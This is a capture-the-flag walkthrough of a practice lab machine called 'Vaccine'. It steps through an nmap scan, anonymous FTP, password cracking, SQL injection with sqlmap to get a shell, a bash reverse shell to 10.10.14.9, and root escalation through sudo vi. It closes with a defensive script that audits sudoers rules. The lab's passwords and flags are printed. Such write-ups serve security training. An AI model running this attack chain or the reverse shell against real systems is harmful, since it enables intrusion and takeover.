# Vaccine

## Initial Scan

```bash
sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FokYgCg4mAIGOezLFgYhQ%2Fimage.png?alt=media&#x26;token=20e13642-0875-4032-8a5d-cbdc587ec6c5" alt=""><figcaption></figcaption></figure>

## Task 1

Besides SSH and HTTP, what other service is hosted on this box?

Answer: FTP

## Task 2

This service can be configured to allow login with any password for a specific username. What is that username?

Answer: anonymous

## Task 3

What is the name of the file downloaded over this service?

```bash
ftp 10.129.248.153
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FxddAToTs9XjFafl40m9W%2Fimage.png?alt=media&#x26;token=139b98b4-a404-44fc-965a-c40ac056315d" alt=""><figcaption></figcaption></figure>

Answer: backup.zip

## Task 4

What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format to allow for cracking attempts?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FFPmWugZC7r9w38e9Z8KI%2Fimage.png?alt=media&#x26;token=b76d3230-90ef-4d06-bd36-958de9055410" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FPuzypiEgPZKFku6nccSK%2Fimage.png?alt=media&#x26;token=bbbd357f-5ee9-4b31-a5e2-38ce0151cb91" alt=""><figcaption></figcaption></figure>

Answer: zip2john

## Task 5

What is the password for the admin user on the website?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FLRmwrVPbLLRVxHk85Bwi%2Fimage.png?alt=media&#x26;token=6516e22d-5d98-41fe-805b-d19531372421" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FbZeT4tTASGG2svmyxIDv%2Fimage.png?alt=media&#x26;token=791847d2-16ec-447c-9bd7-201f9a1170a5" alt=""><figcaption></figcaption></figure>

backup.zip password: `41852963`

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FC81yhimF76V1WcKO4Zhu%2Fimage.png?alt=media&#x26;token=0972ee11-76ff-4d00-856c-e29374140cbf" alt=""><figcaption></figcaption></figure>

Looking at index.html:

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F07ruNyL7jDGUT61BQgdS%2Fimage.png?alt=media&#x26;token=befe0998-5e9b-4ca1-be3c-c4e67cadb55b" alt=""><figcaption></figcaption></figure>

Put the hash in a file and crack it with hashcat (`-m 0` is raw MD5, `-a 0` is a straight wordlist attack):

```bash
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FAt4PyyUxw37LVXcLiUzj%2Fimage.png?alt=media&#x26;token=6595a6e0-82f2-4c1a-b5b7-11484643913c" alt=""><figcaption></figcaption></figure>

Answer: qwerty789

## Task 6

What option can be passed to sqlmap to try to get command execution via the SQL injection?

Looking at `sqlmap -h`:

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F8KbC5UVNn6TW0gVLPGdr%2Fimage.png?alt=media&#x26;token=c61a809f-8f5a-414e-bff2-9808d4eca377" alt=""><figcaption></figcaption></figure>

Answer: --os-shell

## Task 7

What program can the postgres user run as root using sudo?

Get the cookie from the website.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FBV52mtD1l9uwasC4jI3c%2Fimage.png?alt=media&#x26;token=1aec7a1c-3c50-4557-98e8-9bc00cb7d146" alt=""><figcaption></figcaption></figure>

```bash
sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell
```

We get our shell.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fl2f9ug4HIgVpeLcsCcBu%2Fimage.png?alt=media&#x26;token=fe4f6f97-d46c-49fd-97d7-025bb591f695" alt=""><figcaption></figcaption></figure>

Start the listener, then run:

```bash
bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F5zq16Lvc2a8GWYNqTDPj%2Fimage.png?alt=media&#x26;token=75e92fbb-93d9-4015-b309-6fb0daf15252" alt=""><figcaption></figcaption></figure>

Answer: vi

## Task 8

Submit user flag

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FlzHm5WU32PQWSRgJzWuf%2Fimage.png?alt=media&#x26;token=a8c49177-31ce-4c99-9b7f-f43c94e60cba" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FKF5HneTc0UwGXVPKHEsJ%2Fimage.png?alt=media&#x26;token=ed90829c-5e93-4deb-9184-158f5ba3f836" alt=""><figcaption></figcaption></figure>

Answer: ec9b13ca4d6229cd5cc1e09980965bf7

## Task 9

Submit root flag

Looking at the files in /var/www/html, since the site uses PHP. In the dashboard.php file we see:

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FtiMsVp4rR0KGjxuY58R6%2Fimage.png?alt=media&#x26;token=970b84db-a651-4c35-b15e-507ad8775cd7" alt=""><figcaption></figcaption></figure>

`user=postgres password=P@s5w0rd!`

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FKHeenUMY90lmrWQmrOy3%2Fimage.png?alt=media&#x26;token=c5a29c23-4f05-42ae-89cd-8fa97d47ecb6" alt=""><figcaption></figcaption></figure>

Looking at the various options on [GTFOBins](https://gtfobins.github.io/gtfobins/vi/#sudo):

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F1v8vQK0ioM9ra0ZeKTIB%2Fimage.png?alt=media&#x26;token=1a7b17ba-d286-44eb-8b56-632cb6f62e4a" alt=""><figcaption></figcaption></figure>

Open the file that we can only open with `sudo vi`, then:

```
type :set shell=/bin/sh
ENTER
:shell
ENTER
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fq76LdVBeJe3j30JYZHDB%2Fimage.png?alt=media&#x26;token=283d8c3e-6697-418e-aaad-90f00049e676" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FTXlITHFNJAn7VRSfhXYW%2Fimage.png?alt=media&#x26;token=047501ce-0e99-490d-bcc1-ada829ecdd10" alt=""><figcaption></figcaption></figure>

Answer: dd6e058e814260bc70e9bbdef2715849
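
The root cause of the escalation above is a sudoers rule that hands an interactive editor to an unprivileged account. As an added example (not part of the original walkthrough), this POSIX shell audit flags sudoers rules that grant a shell-escape-capable program without `NOEXEC`; the rule lines, paths, the `%admin`, `backup` and `dba` names, and the `ESCAPABLE` list are constructed for illustration.

```bash
#!/bin/sh
# Added example: flag sudoers rules that let a user run a program with a
# built-in shell escape (as vi has) as another user without NOEXEC.
# Simplifications: aliases are not expanded; NOEXEC is treated per line.

# Subset of programs that can spawn a shell from inside their own UI.
ESCAPABLE="vi vim view nano less more man ed"

# Reads sudoers-style rules on stdin; prints "RISKY <user> <command path>".
audit_sudoers() {
    awk -v list="$ESCAPABLE" '
        BEGIN { k = split(list, a, " "); for (i = 1; i <= k; i++) risky[a[i]] = 1 }
        /^[ \t]*#/ || /^[ \t]*$/ { next }            # comments, blank lines
        /^[ \t]*(Defaults|[A-Za-z]+_Alias)/ { next } # settings, alias definitions
        {
            user = $1
            spec = $0
            sub(/^[^=]*=[ \t]*/, "", spec)           # drop "user host ="
            noexec = (spec ~ /NOEXEC:/)
            gsub(/\([^)]*\)[ \t]*/, "", spec)        # drop Runas, e.g. (ALL)
            gsub(/[A-Z_]+:[ \t]*/, "", spec)         # drop tags, e.g. NOPASSWD:
            n = split(spec, cmds, /[ \t]*,[ \t]*/)
            for (i = 1; i <= n; i++) {
                split(cmds[i], w, /[ \t]+/)
                base = w[1]; sub(/.*\//, "", base)   # basename of the command
                if ((base in risky) && !noexec) print "RISKY", user, w[1]
            }
        }'
}

# Constructed sample rules (not taken from the target machine).
sample_rules() {
    cat <<'EOF'
# constructed sudoers excerpt
Defaults env_reset
postgres ALL=(ALL) /bin/vi /etc/example/placeholder.conf
%admin   ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/vim
backup   ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
dba      ALL=(root) sudoedit /etc/example/placeholder.conf
EOF
}

sample_rules | audit_sudoers
```

Replacing a flagged rule with a `sudoedit <file>` entry, or tagging it `NOEXEC:`, lets the account edit the file without being able to spawn a root shell from the editor.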
